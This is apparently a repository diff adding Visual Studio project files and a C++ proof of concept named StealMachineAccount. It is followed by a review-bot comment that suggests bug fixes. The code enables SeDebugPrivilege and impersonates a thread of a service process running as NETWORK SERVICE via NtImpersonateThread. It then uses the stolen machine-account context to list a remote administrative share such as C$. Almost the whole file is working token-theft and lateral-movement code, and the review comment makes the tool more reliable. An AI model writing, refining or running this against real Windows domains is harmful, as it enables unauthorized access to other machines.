<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="StealAllTokens.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Archivos de origen">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Archivos de encabezado">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Archivos de recursos">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="StealAllTokens.cpp">
<Filter>Archivos de origen</Filter>
</ClCompile>
</ItemGroup>
</Project>
@@ -0,0 +1,289 @@
/********************************************************************
* StealMachineAccount: This PoC takes profit of a privileged
* machine domain account (like for example a local admin or domain admin)
* on a Windows domain, stealing a System token and impersonating
* machine acount for remote auhtentication and listing C$.
* The point here is to impersonate a lower privilege service like RPCSS
* running with NETWORK SERVICE account.
*
* NOTE: We consider that source process has local Admnin privs and
* has High integrity (no SYSTEM account needed)
*********************************************************************/
#include <iostream>
#define MAX_NAME 256
#include <windows.h>
#include <tlhelp32.h>
#include <Lmcons.h>
#include <psapi.h>
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <strsafe.h>
#include <stdlib.h>
std::string get_username()
{
TCHAR username[UNLEN + 1] = { 0 };
DWORD username_len = UNLEN + 1;
int res = GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
}
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
}
return TRUE;
}
HANDLE ListProcessThreads(DWORD dwOwnerPID)
{
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
// Take a snapshot of all running threads
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnap == INVALID_HANDLE_VALUE)
return(FALSE);
// Fill in the size of the structure before using it.
te32.dwSize = sizeof(THREADENTRY32);
// Retrieve information about the first thread,
// and exit if unsuccessful
if (!Thread32First(hThreadSnap, &te32))
{
printf("[-] Error Thread32First\n"); // Show cause of failure
CloseHandle(hThreadSnap); // Must clean up the snapshot object!
return(NULL);
}
// Now walk the thread list of the system,
// and display information about each thread
// associated with the specified process
do
{
if (te32.th32OwnerProcessID == dwOwnerPID)
{
//printf("\n THREAD ID = 0x%08X", te32.th32ThreadID);
//printf("\n base priority = %d", te32.tpBasePri);
//printf("\n delta priority = %d", te32.tpDeltaPri);
HANDLE thandle = OpenThread(THREAD_DIRECT_IMPERSONATION,
TRUE,
te32.th32ThreadID
);
CloseHandle(hThreadSnap);
if (thandle == NULL) {
printf("[-] OpenThread failed\n");
return (NULL);
}
else {
printf("[+] OpenThread 0x%08X success!\n", te32.th32ThreadID);
return (thandle);
}
}
} while (Thread32Next(hThreadSnap, &te32));
printf("[-] Process not found\n");
return (NULL);
}
bool listdirectories(WCHAR *directory)
{
WIN32_FIND_DATA ffd;
LARGE_INTEGER filesize;
TCHAR szDir[MAX_PATH];
size_t length_of_arg;
HANDLE hFind = INVALID_HANDLE_VALUE;
DWORD dwError = 0;
StringCchLength(directory, MAX_PATH, &length_of_arg);
printf("\nTarget directory is %s\n\n", directory);
// Prepare string for use with FindFile functions. First, copy the
// string to a buffer, then append '\*' to the directory name.
StringCchCopy(szDir, MAX_PATH, directory);
StringCchCat(szDir, MAX_PATH, TEXT("\\*"));
// Find the first file in the directory.
hFind = FindFirstFile(szDir, &ffd);
if (INVALID_HANDLE_VALUE == hFind)
{
printf("[-] FindFirstFile INVALID_HANDLE_VALUE! %i\n", GetLastError());
return false;
}
// List all the files in the directory with some info about them.
do
{
if (ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
wprintf(L" %ws <DIR>\n", ffd.cFileName);
}
else
{
filesize.LowPart = ffd.nFileSizeLow;
filesize.HighPart = ffd.nFileSizeHigh;
wprintf(L" %ws %ld bytes\n", ffd.cFileName, filesize.QuadPart);
}
} while (FindNextFile(hFind, &ffd) != 0);
dwError = GetLastError();
if (dwError != ERROR_NO_MORE_FILES)
{
printf("[-] FindFirstFile ERROR_NO_MORE_FILES! %i\n", dwError);
return false;
}
FindClose(hFind);
return true;
}
int wmain(int argc, wchar_t** argv)
{
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
//sqos.ImpersonationLevel = SecurityIdentification;
DWORD bsize = 1024;
CHAR buffer[1024];
HANDLE currentTokenHandle = NULL;
if (argc != 3) {
wprintf(L"usage: %ws <PID> <NetShare>\n", argv[0]);
wprintf(L" Ex. StealMachineAccount 1020 \\WIN-VXQKGX098Q0\C$\n");
}
// Grab PID from command line argument
DWORD pid = _wtoi(argv[1]);
// Add SE debug privilege
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
else {
printf("[-] SeDebugPrivilege not enabled!\n");
exit(1);
}
// Call OpenProcess(), print return code and error code
HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, pid);
if (GetLastError() == NULL) {
//Get process image name
QueryFullProcessImageNameA((HMODULE)processHandle, 0, buffer, &bsize);
if (GetLastError() != NULL)
{
printf("[-] Technique2 QueryFullProcessImageNameA Pid %i Error: %i\n", pid, GetLastError());
return false;
}
printf("[+] Technique2 OpenProcess() %s success with pid %i !\n", buffer, pid);
}
else
{
printf("[-] Technique2 OpenProcess() Pid %i Error: %i\n", pid, GetLastError());
return false;
}
//Get handle from first process thread
HANDLE hThreadToImpersonate = ListProcessThreads(pid);
if (hThreadToImpersonate == NULL)
{
printf("[-] Technique2 Error getting pthread\n");
return false;
}
//Calling NativeAPI NtImpersonateThread
typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle,
HANDLE ThreadToImpersonate,
PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
NtImpersonateThread* fNtImpersonateThread =
(NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtImpersonateThread");
// Impersonate user in a thread
BOOL impersonateUser = fNtImpersonateThread(GetCurrentThread(), hThreadToImpersonate, &sqos);
if (GetLastError() == NULL)
{
printf("[+] Technique2 fNtImpersonateThread() %s success!\n", buffer);
printf("[+] Technique2 Current user is: %s\n", (get_username()).c_str());
//wchar_t server[] = L"WIN-VXQKGX098Q0.prueba.com";
if (listdirectories(argv[2]))
printf("[+] Shares listed!\n");
else
printf("[-] listdirectories error!\n");
}
else
{
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
}
getchar();
// Closing not necessary handles
CloseHandle(hThreadToImpersonate);
CloseHandle(processHandle);
return true;
}
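Review bot: In `wmain`, the `if (argc != 3)` branch prints the usage text but never returns, so a run with missing arguments continues to `_wtoi(argv[1])` and reads past the end of the argument vector; the branch should end with `return 1;`. The example in that usage string also loses its backslashes, because `\\` yields a single backslash and `\C` is not a recognised escape; it should read `L" Ex. StealMachineAccount 1020 \\\\WIN-VXQKGX098Q0\\C$\n"`. Cleanup is incomplete as well: `currentTokenHandle` is never closed, and the thread is still impersonating when it blocks in `getchar()` and returns, so a `RevertToSelf();` before the `CloseHandle` calls would restore the original security context.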
@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Archivos de origen">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Archivos de encabezado">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Archivos de recursos">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="StealMachineAccount.cpp">
<Filter>Archivos de origen</Filter>
</ClCompile>
</ItemGroup>
</Project>
@@ -0,0 +1,148 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{20a29cef-6648-44ac-8b28-b3c362926d3b}</ProjectGuid>
<RootNamespace>StealMachineAccount</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<ProjectName>StealMachineAccount</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="StealMachineAccount.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>